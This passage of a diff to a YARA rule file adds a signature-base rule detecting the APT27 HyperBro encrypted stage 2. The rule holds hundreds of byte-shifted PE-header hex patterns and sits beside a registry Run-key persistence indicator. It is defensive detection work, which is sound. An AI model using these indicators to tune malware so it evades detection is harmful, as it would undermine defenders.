+		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\windefenders" ascii
+
+	condition:
+		1 of them
+}
+rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Encrypted_Stage2 : FILE
+{
+	meta:
+		description = "HyperBro Encrypted Stage 2 detection. Looks for all possible one byte shifts of the lznt1 compressed PE header"
+		author = "Moritz Oettle"
+		id = "fa4fe057-4c3f-5785-a8d3-588398360996"
+		date = "2022-02-07"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L120-L389"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "c3b07bdb19730fc9c8cca8aa7581a32eb80e3dbc5c4d366fbb2f9966081c1a21"
+		score = 75
+		quality = 60
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
+		hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
 
 	strings:
-		$pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase
-		$struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ??  }
+		$encrypted_pe_header_shift_0 = { fc b9 00 4d 5a 90 00 03 00 00 00 82 04 00 30 ff ff 00 }
+		$encrypted_pe_header_shift_1 = { fd ba 01 4e 5b 91 01 04 01 01 01 83 05 01 31 00 00 01 }
+		$encrypted_pe_header_shift_2 = { fe bb 02 4f 5c 92 02 05 02 02 02 84 06 02 32 01 01 02 }
+		$encrypted_pe_header_shift_3 = { ff bc 03 50 5d 93 03 06 03 03 03 85 07 03 33 02 02 03 }
+		$encrypted_pe_header_shift_4 = { 00 bd 04 51 5e 94 04 07 04 04 04 86 08 04 34 03 03 04 }
+		$encrypted_pe_header_shift_5 = { 01 be 05 52 5f 95 05 08 05 05 05 87 09 05 35 04 04 05 }
+		$encrypted_pe_header_shift_6 = { 02 bf 06 53 60 96 06 09 06 06 06 88 0a 06 36 05 05 06 }
+		$encrypted_pe_header_shift_7 = { 03 c0 07 54 61 97 07 0a 07 07 07 89 0b 07 37 06 06 07 }
+		$encrypted_pe_header_shift_8 = { 04 c1 08 55 62 98 08 0b 08 08 08 8a 0c 08 38 07 07 08 }
+		$encrypted_pe_header_shift_9 = { 05 c2 09 56 63 99 09 0c 09 09 09 8b 0d 09 39 08 08 09 }
+		$encrypted_pe_header_shift_10 = { 06 c3 0a 57 64 9a 0a 0d 0a 0a 0a 8c 0e 0a 3a 09 09 0a }
+		$encrypted_pe_header_shift_11 = { 07 c4 0b 58 65 9b 0b 0e 0b 0b 0b 8d 0f 0b 3b 0a 0a 0b }
+		$encrypted_pe_header_shift_12 = { 08 c5 0c 59 66 9c 0c 0f 0c 0c 0c 8e 10 0c 3c 0b 0b 0c }
+		$encrypted_pe_header_shift_13 = { 09 c6 0d 5a 67 9d 0d 10 0d 0d 0d 8f 11 0d 3d 0c 0c 0d }
+		$encrypted_pe_header_shift_14 = { 0a c7 0e 5b 68 9e 0e 11 0e 0e 0e 90 12 0e 3e 0d 0d 0e }
+		$encrypted_pe_header_shift_15 = { 0b c8 0f 5c 69 9f 0f 12 0f 0f 0f 91 13 0f 3f 0e 0e 0f }
+		$encrypted_pe_header_shift_16 = { 0c c9 10 5d 6a a0 10 13 10 10 10 92 14 10 40 0f 0f 10 }
+		$encrypted_pe_header_shift_17 = { 0d ca 11 5e 6b a1 11 14 11 11 11 93 15 11 41 10 10 11 }
+		$encrypted_pe_header_shift_18 = { 0e cb 12 5f 6c a2 12 15 12 12 12 94 16 12 42 11 11 12 }
+		$encrypted_pe_header_shift_19 = { 0f cc 13 60 6d a3 13 16 13 13 13 95 17 13 43 12 12 13 }
+		$encrypted_pe_header_shift_20 = { 10 cd 14 61 6e a4 14 17 14 14 14 96 18 14 44 13 13 14 }
+		$encrypted_pe_header_shift_21 = { 11 ce 15 62 6f a5 15 18 15 15 15 97 19 15 45 14 14 15 }
+		$encrypted_pe_header_shift_22 = { 12 cf 16 63 70 a6 16 19 16 16 16 98 1a 16 46 15 15 16 }
+		$encrypted_pe_header_shift_23 = { 13 d0 17 64 71 a7 17 1a 17 17 17 99 1b 17 47 16 16 17 }
+		$encrypted_pe_header_shift_24 = { 14 d1 18 65 72 a8 18 1b 18 18 18 9a 1c 18 48 17 17 18 }
+		$encrypted_pe_header_shift_25 = { 15 d2 19 66 73 a9 19 1c 19 19 19 9b 1d 19 49 18 18 19 }
+		$encrypted_pe_header_shift_26 = { 16 d3 1a 67 74 aa 1a 1d 1a 1a 1a 9c 1e 1a 4a 19 19 1a }
+		$encrypted_pe_header_shift_27 = { 17 d4 1b 68 75 ab 1b 1e 1b 1b 1b 9d 1f 1b 4b 1a 1a 1b }
+		$encrypted_pe_header_shift_28 = { 18 d5 1c 69 76 ac 1c 1f 1c 1c 1c 9e 20 1c 4c 1b 1b 1c }
+		$encrypted_pe_header_shift_29 = { 19 d6 1d 6a 77 ad 1d 20 1d 1d 1d 9f 21 1d 4d 1c 1c 1d }
+		$encrypted_pe_header_shift_30 = { 1a d7 1e 6b 78 ae 1e 21 1e 1e 1e a0 22 1e 4e 1d 1d 1e }
+		$encrypted_pe_header_shift_31 = { 1b d8 1f 6c 79 af 1f 22 1f 1f 1f a1 23 1f 4f 1e 1e 1f }
+		$encrypted_pe_header_shift_32 = { 1c d9 20 6d 7a b0 20 23 20 20 20 a2 24 20 50 1f 1f 20 }
+		$encrypted_pe_header_shift_33 = { 1d da 21 6e 7b b1 21 24 21 21 21 a3 25 21 51 20 20 21 }
+		$encrypted_pe_header_shift_34 = { 1e db 22 6f 7c b2 22 25 22 22 22 a4 26 22 52 21 21 22 }
+		$encrypted_pe_header_shift_35 = { 1f dc 23 70 7d b3 23 26 23 23 23 a5 27 23 53 22 22 23 }
+		$encrypted_pe_header_shift_36 = { 20 dd 24 71 7e b4 24 27 24 24 24 a6 28 24 54 23 23 24 }
+		$encrypted_pe_header_shift_37 = { 21 de 25 72 7f b5 25 28 25 25 25 a7 29 25 55 24 24 25 }
+		$encrypted_pe_header_shift_38 = { 22 df 26 73 80 b6 26 29 26 26 26 a8 2a 26 56 25 25 26 }
+		$encrypted_pe_header_shift_39 = { 23 e0 27 74 81 b7 27 2a 27 27 27 a9 2b 27 57 26 26 27 }
+		$encrypted_pe_header_shift_40 = { 24 e1 28 75 82 b8 28 2b 28 28 28 aa 2c 28 58 27 27 28 }
+		$encrypted_pe_header_shift_41 = { 25 e2 29 76 83 b9 29 2c 29 29 29 ab 2d 29 59 28 28 29 }
+		$encrypted_pe_header_shift_42 = { 26 e3 2a 77 84 ba 2a 2d 2a 2a 2a ac 2e 2a 5a 29 29 2a }
+		$encrypted_pe_header_shift_43 = { 27 e4 2b 78 85 bb 2b 2e 2b 2b 2b ad 2f 2b 5b 2a 2a 2b }
+		$encrypted_pe_header_shift_44 = { 28 e5 2c 79 86 bc 2c 2f 2c 2c 2c ae 30 2c 5c 2b 2b 2c }
+		$encrypted_pe_header_shift_45 = { 29 e6 2d 7a 87 bd 2d 30 2d 2d 2d af 31 2d 5d 2c 2c 2d }
+		$encrypted_pe_header_shift_46 = { 2a e7 2e 7b 88 be 2e 31 2e 2e 2e b0 32 2e 5e 2d 2d 2e }
+		$encrypted_pe_header_shift_47 = { 2b e8 2f 7c 89 bf 2f 32 2f 2f 2f b1 33 2f 5f 2e 2e 2f }
+		$encrypted_pe_header_shift_48 = { 2c e9 30 7d 8a c0 30 33 30 30 30 b2 34 30 60 2f 2f 30 }
+		$encrypted_pe_header_shift_49 = { 2d ea 31 7e 8b c1 31 34 31 31 31 b3 35 31 61 30 30 31 }
+		$encrypted_pe_header_shift_50 = { 2e eb 32 7f 8c c2 32 35 32 32 32 b4 36 32 62 31 31 32 }
+		$encrypted_pe_header_shift_51 = { 2f ec 33 80 8d c3 33 36 33 33 33 b5 37 33 63 32 32 33 }
+		$encrypted_pe_header_shift_52 = { 30 ed 34 81 8e c4 34 37 34 34 34 b6 38 34 64 33 33 34 }
+		$encrypted_pe_header_shift_53 = { 31 ee 35 82 8f c5 35 38 35 35 35 b7 39 35 65 34 34 35 }
+		$encrypted_pe_header_shift_54 = { 32 ef 36 83 90 c6 36 39 36 36 36 b8 3a 36 66 35 35 36 }
+		$encrypted_pe_header_shift_55 = { 33 f0 37 84 91 c7 37 3a 37 37 37 b9 3b 37 67 36 36 37 }
+		$encrypted_pe_header_shift_56 = { 34 f1 38 85 92 c8 38 3b 38 38 38 ba 3c 38 68 37 37 38 }
+		$encrypted_pe_header_shift_57 = { 35 f2 39 86 93 c9 39 3c 39 39 39 bb 3d 39 69 38 38 39 }
+		$encrypted_pe_header_shift_58 = { 36 f3 3a 87 94 ca 3a 3d 3a 3a 3a bc 3e 3a 6a 39 39 3a }
+		$encrypted_pe_header_shift_59 = { 37 f4 3b 88 95 cb 3b 3e 3b 3b 3b bd 3f 3b 6b 3a 3a 3b }
+		$encrypted_pe_header_shift_60 = { 38 f5 3c 89 96 cc 3c 3f 3c 3c 3c be 40 3c 6c 3b 3b 3c }
+		$encrypted_pe_header_shift_61 = { 39 f6 3d 8a 97 cd 3d 40 3d 3d 3d bf 41 3d 6d 3c 3c 3d }
+		$encrypted_pe_header_shift_62 = { 3a f7 3e 8b 98 ce 3e 41 3e 3e 3e c0 42 3e 6e 3d 3d 3e }
+		$encrypted_pe_header_shift_63 = { 3b f8 3f 8c 99 cf 3f 42 3f 3f 3f c1 43 3f 6f 3e 3e 3f }
+		$encrypted_pe_header_shift_64 = { 3c f9 40 8d 9a d0 40 43 40 40 40 c2 44 40 70 3f 3f 40 }
+		$encrypted_pe_header_shift_65 = { 3d fa 41 8e 9b d1 41 44 41 41 41 c3 45 41 71 40 40 41 }
+		$encrypted_pe_header_shift_66 = { 3e fb 42 8f 9c d2 42 45 42 42 42 c4 46 42 72 41 41 42 }
+		$encrypted_pe_header_shift_67 = { 3f fc 43 90 9d d3 43 46 43 43 43 c5 47 43 73 42 42 43 }
+		$encrypted_pe_header_shift_68 = { 40 fd 44 91 9e d4 44 47 44 44 44 c6 48 44 74 43 43 44 }
+		$encrypted_pe_header_shift_69 = { 41 fe 45 92 9f d5 45 48 45 45 45 c7 49 45 75 44 44 45 }
+		$encrypted_pe_header_shift_70 = { 42 ff 46 93 a0 d6 46 49 46 46 46 c8 4a 46 76 45 45 46 }
+		$encrypted_pe_header_shift_71 = { 43 00 47 94 a1 d7 47 4a 47 47 47 c9 4b 47 77 46 46 47 }
+		$encrypted_pe_header_shift_72 = { 44 01 48 95 a2 d8 48 4b 48 48 48 ca 4c 48 78 47 47 48 }
+		$encrypted_pe_header_shift_73 = { 45 02 49 96 a3 d9 49 4c 49 49 49 cb 4d 49 79 48 48 49 }
+		$encrypted_pe_header_shift_74 = { 46 03 4a 97 a4 da 4a 4d 4a 4a 4a cc 4e 4a 7a 49 49 4a }
+		$encrypted_pe_header_shift_75 = { 47 04 4b 98 a5 db 4b 4e 4b 4b 4b cd 4f 4b 7b 4a 4a 4b }
+		$encrypted_pe_header_shift_76 = { 48 05 4c 99 a6 dc 4c 4f 4c 4c 4c ce 50 4c 7c 4b 4b 4c }
+		$encrypted_pe_header_shift_77 = { 49 06 4d 9a a7 dd 4d 50 4d 4d 4d cf 51 4d 7d 4c 4c 4d }
+		$encrypted_pe_header_shift_78 = { 4a 07 4e 9b a8 de 4e 51 4e 4e 4e d0 52 4e 7e 4d 4d 4e }
+		$encrypted_pe_header_shift_79 = { 4b 08 4f 9c a9 df 4f 52 4f 4f 4f d1 53 4f 7f 4e 4e 4f }
+		$encrypted_pe_header_shift_80 = { 4c 09 50 9d aa e0 50 53 50 50 50 d2 54 50 80 4f 4f 50 }
+		$encrypted_pe_header_shift_81 = { 4d 0a 51 9e ab e1 51 54 51 51 51 d3 55 51 81 50 50 51 }
+		$encrypted_pe_header_shift_82 = { 4e 0b 52 9f ac e2 52 55 52 52 52 d4 56 52 82 51 51 52 }
+		$encrypted_pe_header_shift_83 = { 4f 0c 53 a0 ad e3 53 56 53 53 53 d5 57 53 83 52 52 53 }
+		$encrypted_pe_header_shift_84 = { 50 0d 54 a1 ae e4 54 57 54 54 54 d6 58 54 84 53 53 54 }
+		$encrypted_pe_header_shift_85 = { 51 0e 55 a2 af e5 55 58 55 55 55 d7 59 55 85 54 54 55 }
+		$encrypted_pe_header_shift_86 = { 52 0f 56 a3 b0 e6 56 59 56 56 56 d8 5a 56 86 55 55 56 }
+		$encrypted_pe_header_shift_87 = { 53 10 57 a4 b1 e7 57 5a 57 57 57 d9 5b 57 87 56 56 57 }
+		$encrypted_pe_header_shift_88 = { 54 11 58 a5 b2 e8 58 5b 58 58 58 da 5c 58 88 57 57 58 }
+		$encrypted_pe_header_shift_89 = { 55 12 59 a6 b3 e9 59 5c 59 59 59 db 5d 59 89 58 58 59 }
+		$encrypted_pe_header_shift_90 = { 56 13 5a a7 b4 ea 5a 5d 5a 5a 5a dc 5e 5a 8a 59 59 5a }
+		$encrypted_pe_header_shift_91 = { 57 14 5b a8 b5 eb 5b 5e 5b 5b 5b dd 5f 5b 8b 5a 5a 5b }
+		$encrypted_pe_header_shift_92 = { 58 15 5c a9 b6 ec 5c 5f 5c 5c 5c de 60 5c 8c 5b 5b 5c }
+		$encrypted_pe_header_shift_93 = { 59 16 5d aa b7 ed 5d 60 5d 5d 5d df 61 5d 8d 5c 5c 5d }
+		$encrypted_pe_header_shift_94 = { 5a 17 5e ab b8 ee 5e 61 5e 5e 5e e0 62 5e 8e 5d 5d 5e }
+		$encrypted_pe_header_shift_95 = { 5b 18 5f ac b9 ef 5f 62 5f 5f 5f e1 63 5f 8f 5e 5e 5f }
+		$encrypted_pe_header_shift_96 = { 5c 19 60 ad ba f0 60 63 60 60 60 e2 64 60 90 5f 5f 60 }
+		$encrypted_pe_header_shift_97 = { 5d 1a 61 ae bb f1 61 64 61 61 61 e3 65 61 91 60 60 61 }
+		$encrypted_pe_header_shift_98 = { 5e 1b 62 af bc f2 62 65 62 62 62 e4 66 62 92 61 61 62 }
+		$encrypted_pe_header_shift_99 = { 5f 1c 63 b0 bd f3 63 66 63 63 63 e5 67 63 93 62 62 63 }
+		$encrypted_pe_header_shift_100 = { 60 1d 64 b1 be f4 64 67 64 64 64 e6 68 64 94 63 63 64 }
+		$encrypted_pe_header_shift_101 = { 61 1e 65 b2 bf f5 65 68 65 65 65 e7 69 65 95 64 64 65 }
+		$encrypted_pe_header_shift_102 = { 62 1f 66 b3 c0 f6 66 69 66 66 66 e8 6a 66 96 65 65 66 }
+		$encrypted_pe_header_shift_103 = { 63 20 67 b4 c1 f7 67 6a 67 67 67 e9 6b 67 97 66 66 67 }
+		$encrypted_pe_header_shift_104 = { 64 21 68 b5 c2 f8 68 6b 68 68 68 ea 6c 68 98 67 67 68 }
+		$encrypted_pe_header_shift_105 = { 65 22 69 b6 c3 f9 69 6c 69 69 69 eb 6d 69 99 68 68 69 }
+		$encrypted_pe_header_shift_106 = { 66 23 6a b7 c4 fa 6a 6d 6a 6a 6a ec 6e 6a 9a 69 69 6a }
+		$encrypted_pe_header_shift_107 = { 67 24 6b b8 c5 fb 6b 6e 6b 6b 6b ed 6f 6b 9b 6a 6a 6b }
+		$encrypted_pe_header_shift_108 = { 68 25 6c b9 c6 fc 6c 6f 6c 6c 6c ee 70 6c 9c 6b 6b 6c }
+		$encrypted_pe_header_shift_109 = { 69 26 6d ba c7 fd 6d 70 6d 6d 6d ef 71 6d 9d 6c 6c 6d }
+		$encrypted_pe_header_shift_110 = { 6a 27 6e bb c8 fe 6e 71 6e 6e 6e f0 72 6e 9e 6d 6d 6e }
+		$encrypted_pe_header_shift_111 = { 6b 28 6f bc c9 ff 6f 72 6f 6f 6f f1 73 6f 9f 6e 6e 6f }
+		$encrypted_pe_header_shift_112 = { 6c 29 70 bd ca 00 70 73 70 70 70 f2 74 70 a0 6f 6f 70 }
+		$encrypted_pe_header_shift_113 = { 6d 2a 71 be cb 01 71 74 71 71 71 f3 75 71 a1 70 70 71 }
+		$encrypted_pe_header_shift_114 = { 6e 2b 72 bf cc 02 72 75 72 72 72 f4 76 72 a2 71 71 72 }
+		$encrypted_pe_header_shift_115 = { 6f 2c 73 c0 cd 03 73 76 73 73 73 f5 77 73 a3 72 72 73 }
+		$encrypted_pe_header_shift_116 = { 70 2d 74 c1 ce 04 74 77 74 74 74 f6 78 74 a4 73 73 74 }
+		$encrypted_pe_header_shift_117 = { 71 2e 75 c2 cf 05 75 78 75 75 75 f7 79 75 a5 74 74 75 }
+		$encrypted_pe_header_shift_118 = { 72 2f 76 c3 d0 06 76 79 76 76 76 f8 7a 76 a6 75 75 76 }
+		$encrypted_pe_header_shift_119 = { 73 30 77 c4 d1 07 77 7a 77 77 77 f9 7b 77 a7 76 76 77 }
+		$encrypted_pe_header_shift_120 = { 74 31 78 c5 d2 08 78 7b 78 78 78 fa 7c 78 a8 77 77 78 }
+		$encrypted_pe_header_shift_121 = { 75 32 79 c6 d3 09 79 7c 79 79 79 fb 7d 79 a9 78 78 79 }
+		$encrypted_pe_header_shift_122 = { 76 33 7a c7 d4 0a 7a 7d 7a 7a 7a fc 7e 7a aa 79 79 7a }
+		$encrypted_pe_header_shift_123 = { 77 34 7b c8 d5 0b 7b 7e 7b 7b 7b fd 7f 7b ab 7a 7a 7b }
+		$encrypted_pe_header_shift_124 = { 78 35 7c c9 d6 0c 7c 7f 7c 7c 7c fe 80 7c ac 7b 7b 7c }
+		$encrypted_pe_header_shift_125 = { 79 36 7d ca d7 0d 7d 80 7d 7d 7d ff 81 7d ad 7c 7c 7d }
+		$encrypted_pe_header_shift_126 = { 7a 37 7e cb d8 0e 7e 81 7e 7e 7e 00 82 7e ae 7d 7d 7e }
+		$encrypted_pe_header_shift_127 = { 7b 38 7f cc d9 0f 7f 82 7f 7f 7f 01 83 7f af 7e 7e 7f }
+		$encrypted_pe_header_shift_128 = { 7c 39 80 cd da 10 80 83 80 80 80 02 84 80 b0 7f 7f 80 }
+		$encrypted_pe_header_shift_129 = { 7d 3a 81 ce db 11 81 84 81 81 81 03 85 81 b1 80 80 81 }
+		$encrypted_pe_header_shift_130 = { 7e 3b 82 cf dc 12 82 85 82 82 82 04 86 82 b2 81 81 82 }
+		$encrypted_pe_header_shift_131 = { 7f 3c 83 d0 dd 13 83 86 83 83 83 05 87 83 b3 82 82 83 }
+		$encrypted_pe_header_shift_132 = { 80 3d 84 d1 de 14 84 87 84 84 84 06 88 84 b4 83 83 84 }
+		$encrypted_pe_header_shift_133 = { 81 3e 85 d2 df 15 85 88 85 85 85 07 89 85 b5 84 84 85 }
+		$encrypted_pe_header_shift_134 = { 82 3f 86 d3 e0 16 86 89 86 86 86 08 8a 86 b6 85 85 86 }
+		$encrypted_pe_header_shift_135 = { 83 40 87 d4 e1 17 87 8a 87 87 87 09 8b 87 b7 86 86 87 }
+		$encrypted_pe_header_shift_136 = { 84 41 88 d5 e2 18 88 8b 88 88 88 0a 8c 88 b8 87 87 88 }
+		$encrypted_pe_header_shift_137 = { 85 42 89 d6 e3 19 89 8c 89 89 89 0b 8d 89 b9 88 88 89 }
+		$encrypted_pe_header_shift_138 = { 86 43 8a d7 e4 1a 8a 8d 8a 8a 8a 0c 8e 8a ba 89 89 8a }
+		$encrypted_pe_header_shift_139 = { 87 44 8b d8 e5 1b 8b 8e 8b 8b 8b 0d 8f 8b bb 8a 8a 8b }
+		$encrypted_pe_header_shift_140 = { 88 45 8c d9 e6 1c 8c 8f 8c 8c 8c 0e 90 8c bc 8b 8b 8c }
+		$encrypted_pe_header_shift_141 = { 89 46 8d da e7 1d 8d 90 8d 8d 8d 0f 91 8d bd 8c 8c 8d }
+		$encrypted_pe_header_shift_142 = { 8a 47 8e db e8 1e 8e 91 8e 8e 8e 10 92 8e be 8d 8d 8e }
+		$encrypted_pe_header_shift_143 = { 8b 48 8f dc e9 1f 8f 92 8f 8f 8f 11 93 8f bf 8e 8e 8f }
+		$encrypted_pe_header_shift_144 = { 8c 49 90 dd ea 20 90 93 90 90 90 12 94 90 c0 8f 8f 90 }
+		$encrypted_pe_header_shift_145 = { 8d 4a 91 de eb 21 91 94 91 91 91 13 95 91 c1 90 90 91 }
+		$encrypted_pe_header_shift_146 = { 8e 4b 92 df ec 22 92 95 92 92 92 14 96 92 c2 91 91 92 }
+		$encrypted_pe_header_shift_147 = { 8f 4c 93 e0 ed 23 93 96 93 93 93 15 97 93 c3 92 92 93 }
+		$encrypted_pe_header_shift_148 = { 90 4d 94 e1 ee 24 94 97 94 94 94 16 98 94 c4 93 93 94 }
+		$encrypted_pe_header_shift_149 = { 91 4e 95 e2 ef 25 95 98 95 95 95 17 99 95 c5 94 94 95 }
+		$encrypted_pe_header_shift_150 = { 92 4f 96 e3 f0 26 96 99 96 96 96 18 9a 96 c6 95 95 96 }
+		$encrypted_pe_header_shift_151 = { 93 50 97 e4 f1 27 97 9a 97 97 97 19 9b 97 c7 96 96 97 }
+		$encrypted_pe_header_shift_152 = { 94 51 98 e5 f2 28 98 9b 98 98 98 1a 9c 98 c8 97 97 98 }
+		$encrypted_pe_header_shift_153 = { 95 52 99 e6 f3 29 99 9c 99 99 99 1b 9d 99 c9 98 98 99 }
+		$encrypted_pe_header_shift_154 = { 96 53 9a e7 f4 2a 9a 9d 9a 9a 9a 1c 9e 9a ca 99 99 9a }
+		$encrypted_pe_header_shift_155 = { 97 54 9b e8 f5 2b 9b 9e 9b 9b 9b 1d 9f 9b cb 9a 9a 9b }
+		$encrypted_pe_header_shift_156 = { 98 55 9c e9 f6 2c 9c 9f 9c 9c 9c 1e a0 9c cc 9b 9b 9c }
+		$encrypted_pe_header_shift_157 = { 99 56 9d ea f7 2d 9d a0 9d 9d 9d 1f a1 9d cd 9c 9c 9d }
+		$encrypted_pe_header_shift_158 = { 9a 57 9e eb f8 2e 9e a1 9e 9e 9e 20 a2 9e ce 9d 9d 9e }
+		$encrypted_pe_header_shift_159 = { 9b 58 9f ec f9 2f 9f a2 9f 9f 9f 21 a3 9f cf 9e 9e 9f }
+		$encrypted_pe_header_shift_160 = { 9c 59 a0 ed fa 30 a0 a3 a0 a0 a0 22 a4 a0 d0 9f 9f a0 }
+		$encrypted_pe_header_shift_161 = { 9d 5a a1 ee fb 31 a1 a4 a1 a1 a1 23 a5 a1 d1 a0 a0 a1 }
+		$encrypted_pe_header_shift_162 = { 9e 5b a2 ef fc 32 a2 a5 a2 a2 a2 24 a6 a2 d2 a1 a1 a2 }
+		$encrypted_pe_header_shift_163 = { 9f 5c a3 f0 fd 33 a3 a6 a3 a3 a3 25 a7 a3 d3 a2 a2 a3 }
+		$encrypted_pe_header_shift_164 = { a0 5d a4 f1 fe 34 a4 a7 a4 a4 a4 26 a8 a4 d4 a3 a3 a4 }
+		$encrypted_pe_header_shift_165 = { a1 5e a5 f2 ff 35 a5 a8 a5 a5 a5 27 a9 a5 d5 a4 a4 a5 }
+		$encrypted_pe_header_shift_166 = { a2 5f a6 f3 00 36 a6 a9 a6 a6 a6 28 aa a6 d6 a5 a5 a6 }
+		$encrypted_pe_header_shift_167 = { a3 60 a7 f4 01 37 a7 aa a7 a7 a7 29 ab a7 d7 a6 a6 a7 }
+		$encrypted_pe_header_shift_168 = { a4 61 a8 f5 02 38 a8 ab a8 a8 a8 2a ac a8 d8 a7 a7 a8 }
+		$encrypted_pe_header_shift_169 = { a5 62 a9 f6 03 39 a9 ac a9 a9 a9 2b ad a9 d9 a8 a8 a9 }
+		$encrypted_pe_header_shift_170 = { a6 63 aa f7 04 3a aa ad aa aa aa 2c ae aa da a9 a9 aa }
+		$encrypted_pe_header_shift_171 = { a7 64 ab f8 05 3b ab ae ab ab ab 2d af ab db aa aa ab }
+		$encrypted_pe_header_shift_172 = { a8 65 ac f9 06 3c ac af ac ac ac 2e b0 ac dc ab ab ac }
+		$encrypted_pe_header_shift_173 = { a9 66 ad fa 07 3d ad b0 ad ad ad 2f b1 ad dd ac ac ad }
+		$encrypted_pe_header_shift_174 = { aa 67 ae fb 08 3e ae b1 ae ae ae 30 b2 ae de ad ad ae }
+		$encrypted_pe_header_shift_175 = { ab 68 af fc 09 3f af b2 af af af 31 b3 af df ae ae af }
+		$encrypted_pe_header_shift_176 = { ac 69 b0 fd 0a 40 b0 b3 b0 b0 b0 32 b4 b0 e0 af af b0 }
+		$encrypted_pe_header_shift_177 = { ad 6a b1 fe 0b 41 b1 b4 b1 b1 b1 33 b5 b1 e1 b0 b0 b1 }
+		$encrypted_pe_header_shift_178 = { ae 6b b2 ff 0c 42 b2 b5 b2 b2 b2 34 b6 b2 e2 b1 b1 b2 }
+		$encrypted_pe_header_shift_179 = { af 6c b3 00 0d 43 b3 b6 b3 b3 b3 35 b7 b3 e3 b2 b2 b3 }
+		$encrypted_pe_header_shift_180 = { b0 6d b4 01 0e 44 b4 b7 b4 b4 b4 36 b8 b4 e4 b3 b3 b4 }
+		$encrypted_pe_header_shift_181 = { b1 6e b5 02 0f 45 b5 b8 b5 b5 b5 37 b9 b5 e5 b4 b4 b5 }
+		$encrypted_pe_header_shift_182 = { b2 6f b6 03 10 46 b6 b9 b6 b6 b6 38 ba b6 e6 b5 b5 b6 }
+		$encrypted_pe_header_shift_183 = { b3 70 b7 04 11 47 b7 ba b7 b7 b7 39 bb b7 e7 b6 b6 b7 }
+		$encrypted_pe_header_shift_184 = { b4 71 b8 05 12 48 b8 bb b8 b8 b8 3a bc b8 e8 b7 b7 b8 }
+		$encrypted_pe_header_shift_185 = { b5 72 b9 06 13 49 b9 bc b9 b9 b9 3b bd b9 e9 b8 b8 b9 }
+		$encrypted_pe_header_shift_186 = { b6 73 ba 07 14 4a ba bd ba ba ba 3c be ba ea b9 b9 ba }
+		$encrypted_pe_header_shift_187 = { b7 74 bb 08 15 4b bb be bb bb bb 3d bf bb eb ba ba bb }
+		$encrypted_pe_header_shift_188 = { b8 75 bc 09 16 4c bc bf bc bc bc 3e c0 bc ec bb bb bc }
+		$encrypted_pe_header_shift_189 = { b9 76 bd 0a 17 4d bd c0 bd bd bd 3f c1 bd ed bc bc bd }
+		$encrypted_pe_header_shift_190 = { ba 77 be 0b 18 4e be c1 be be be 40 c2 be ee bd bd be }
+		$encrypted_pe_header_shift_191 = { bb 78 bf 0c 19 4f bf c2 bf bf bf 41 c3 bf ef be be bf }
+		$encrypted_pe_header_shift_192 = { bc 79 c0 0d 1a 50 c0 c3 c0 c0 c0 42 c4 c0 f0 bf bf c0 }
+		$encrypted_pe_header_shift_193 = { bd 7a c1 0e 1b 51 c1 c4 c1 c1 c1 43 c5 c1 f1 c0 c0 c1 }
+		$encrypted_pe_header_shift_194 = { be 7b c2 0f 1c 52 c2 c5 c2 c2 c2 44 c6 c2 f2 c1 c1 c2 }
+		$encrypted_pe_header_shift_195 = { bf 7c c3 10 1d 53 c3 c6 c3 c3 c3 45 c7 c3 f3 c2 c2 c3 }
+		$encrypted_pe_header_shift_196 = { c0 7d c4 11 1e 54 c4 c7 c4 c4 c4 46 c8 c4 f4 c3 c3 c4 }
+		$encrypted_pe_header_shift_197 = { c1 7e c5 12 1f 55 c5 c8 c5 c5 c5 47 c9 c5 f5 c4 c4 c5 }
+		$encrypted_pe_header_shift_198 = { c2 7f c6 13 20 56 c6 c9 c6 c6 c6 48 ca c6 f6 c5 c5 c6 }
+		$encrypted_pe_header_shift_199 = { c3 80 c7 14 21 57 c7 ca c7 c7 c7 49 cb c7 f7 c6 c6 c7 }
+		$encrypted_pe_header_shift_200 = { c4 81 c8 15 22 58 c8 cb c8 c8 c8 4a cc c8 f8 c7 c7 c8 }
+		$encrypted_pe_header_shift_201 = { c5 82 c9 16 23 59 c9 cc c9 c9 c9 4b cd c9 f9 c8 c8 c9 }
+		$encrypted_pe_header_shift_202 = { c6 83 ca 17 24 5a ca cd ca ca ca 4c ce ca fa c9 c9 ca }
+		$encrypted_pe_header_shift_203 = { c7 84 cb 18 25 5b cb ce cb cb cb 4d cf cb fb ca ca cb }
+		$encrypted_pe_header_shift_204 = { c8 85 cc 19 26 5c cc cf cc cc cc 4e d0 cc fc cb cb cc }
+		$encrypted_pe_header_shift_205 = { c9 86 cd 1a 27 5d cd d0 cd cd cd 4f d1 cd fd cc cc cd }
+		$encrypted_pe_header_shift_206 = { ca 87 ce 1b 28 5e ce d1 ce ce ce 50 d2 ce fe cd cd ce }
+		$encrypted_pe_header_shift_207 = { cb 88 cf 1c 29 5f cf d2 cf cf cf 51 d3 cf ff ce ce cf }
+		$encrypted_pe_header_shift_208 = { cc 89 d0 1d 2a 60 d0 d3 d0 d0 d0 52 d4 d0 00 cf cf d0 }
+		$encrypted_pe_header_shift_209 = { cd 8a d1 1e 2b 61 d1 d4 d1 d1 d1 53 d5 d1 01 d0 d0 d1 }
